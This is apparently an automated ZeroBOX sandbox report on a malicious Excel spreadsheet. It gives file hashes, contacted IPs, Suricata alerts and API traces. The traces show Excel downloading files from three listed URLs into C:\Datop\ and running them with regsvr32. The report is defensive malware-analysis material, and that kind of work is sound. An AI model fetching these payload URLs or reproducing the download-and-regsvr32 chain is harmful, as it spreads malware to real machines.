Summary | ZeroBOX

chart-1352129573.xls

MSOffice File
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 25, 2021, 5 p.m. Sept. 25, 2021, 5:02 p.m.
Size 245.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Last Saved By: Vdgtjghk, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Fri Sep 24 09:37:12 2021, Security: 0
MD5 3b0372de1f2116a802bc35e1000841d6
SHA256 1d9b090fc4be999d9d3043a19bbf6c6d1f1d740d5d6253cd618bb9462d5cc2e2
CRC32 F03BA3BD
ssdeep 6144:mKpb8rGYrMPe3q7Q0XV5xtuEsi8/dg79nWXcZZVtjKFOTDwvO0PDUlQvS32no7X1:79ndjjKoTDwvbDS3fLvfH1GOP
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
164.124.101.2 Active Moloch
192.124.249.84 Active Moloch
210.245.90.247 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49168 -> 192.124.249.84:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49174 -> 210.245.90.247:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 210.245.90.247:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 210.245.90.247:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 210.245.90.247:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 210.245.90.247:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 210.245.90.247:443 -> 192.168.56.103:49172 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49172 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.124.249.84:443 -> 192.168.56.103:49170 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 192.124.249.84:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49173 -> 210.245.90.247:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 210.245.90.247:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 210.245.90.247:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 210.245.90.247:443 -> 192.168.56.103:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49174 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49174 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2516
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf98000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2516
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b0f2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\test.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
cmdline regsvr32 C:\Datop\test1.test
cmdline regsvr32 C:\Datop\test2.test
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2516
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://finejewels.com.au/w3wU4YqfP/say.html
stack_pivoted: 0
filepath_r: C:\Datop\test.test
filepath: C:\Datop\test.test
2148270085 0

URLDownloadToFileW

url: https://thietbiagt.com/1OLxyr4H/say.html
stack_pivoted: 0
filepath_r: C:\Datop\test1.test
filepath: C:\Datop\test1.test
2148270085 0

URLDownloadToFileW

url: https://new.americold.com/4Tn6Vu2ML/say.html
stack_pivoted: 0
filepath_r: C:\Datop\test2.test
filepath: C:\Datop\test2.test
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\test.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test1.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test2.test
file C:\Windows\System32\regsvr32.exe